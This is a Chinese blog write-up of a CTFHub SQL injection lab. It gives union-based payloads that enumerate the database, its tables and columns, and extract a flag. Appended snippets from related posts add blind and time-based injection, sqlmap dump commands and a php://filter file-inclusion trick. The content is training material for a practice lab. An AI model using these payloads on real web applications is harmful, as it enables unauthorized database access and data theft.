CTFHUB--SQL注入

最新推荐文章于 2025-03-30 17:29:33 发布
最新推荐文章于 2025-03-30 17:29:33 发布
阅读量250 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65766842/article/details/129523859
版权

首先打开题目,题目让我们输入1试一试

发现有回显,我们尝试分析一下它所给我们的语句。

select * from news where id=1

我们可以看到我们所输入的数据是跟在了ID的后面,并且是在url上进行了显示,我们可以知道这是一个gey上传的语句,我们打开hack bar,更改成ID=2试一试

我们的猜想是正确的,我们尝试使用标识符来进行sql命令的注入。

1' order by 2 #

查询数据库

-1' union select 1,database() #

查询表

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

查询列

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #

查内容

-1' union select 1,flag from flag #

m0_65766842
关注
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1223
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1002
CTFHUB SQL
CTFHub-SQL注入
yuqie的博客
06-13 1171
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
ctfhub-技能树-sql注入
最新发布
weixin_64359465的博客
03-30 1056
sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 -C xxx,xxx(字段名字) --dump 爆数据。sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 --columns 爆指定库和表的字段名字。sqlmap -r c:\2.txt -D 【数据库名】 --tables 爆指定库的表名。(接下来注意:要将1变成-1,否则前面不报错后面就不回显了)sqlmap -r ---指定数据包。sqlmap -u ---指定连接。
CTFHUB-SQL注入
m_de_g的博客
08-11 6260
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTFHub SQL注入(一)
2301_80911344的博客
04-08 1013
如果用户输入没有得到充分的处理和逃逸,特别是包含SQL关键字(如SELECT, DROP, UNION)或特殊字符(如单引号',双引号",注释符--等),那么原始SQL语句可能会被篡改。其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分。是SQL中的注释符号,其后面的内容将被视作注释,因此这个查询将忽略密码校验,直接返回用户名为“admin”的用户信息,导致安全验证被绕过。注:列增加后将不能删除。
CTFHub-sql注入
qq_60905276的博客
01-30 5872
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 954
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1352
CTFHUB-WEB-SQL注入
ctfhub-sql布尔盲注
god_001的博客
06-01 831
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1073
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHub---SQL注入
weixin_53736204的博客
07-28 788
1.输入1发现有两个回显,那么直接查库2.查表3.查flag表的字段名4.查表数据。
CTFHubweb SQL注入
2301_81105268的博客
04-18 1426
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTFHub(SQL注入)
cxiaodi的博客
05-09 1380
CTFHubSQL注入专题)
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1853
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
ctfhub SQL注入
mrwangtw的博客
09-03 355
整数型注入 (1)判断是否存在注入 1)加单引号 2)加and 1=1 3)加and 1=2 (2)查询字段 id=1 order by 2如果返回和id=1一样的结果,则order by 3,如果返回值与id=1时不同,那么字段就是2个 (3)查询SQL语句插入位置 ?id=-1 union select 1,2;查看结果 (4)获取数据库名 获取当前数据库 ?id=-1 union select 1,database() 获取所有数据库 ?id=-1 union se.
CTFHUBsql注入
Vesperrrrrrr的博客
11-02 171
sqlmap 自动注入: 因为这道题之前俺写过,当时用的 sqlmap 自动注入,具体就三条语句: python sqlmap.py -u "" --cookie "id=1" --dbs --level 2 python sqlmap.py -u "" --cookie "id=1" -D sqli --tables --level 2 python sqlmap.py -u "" --cookie "id=1" -D sqli -T frkadyqcec --columns --dump --l
CTFhub SQL注入
weixin_62420492的博客
01-28 3063
整数型注入 基本步骤 检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 猜字段数 order by x 得出字段数 爆数据库名 ? id=1 and 1=2 union select 1,database() 爆表名 ? id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.rables where table _schema='sqli' 得到表名n
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值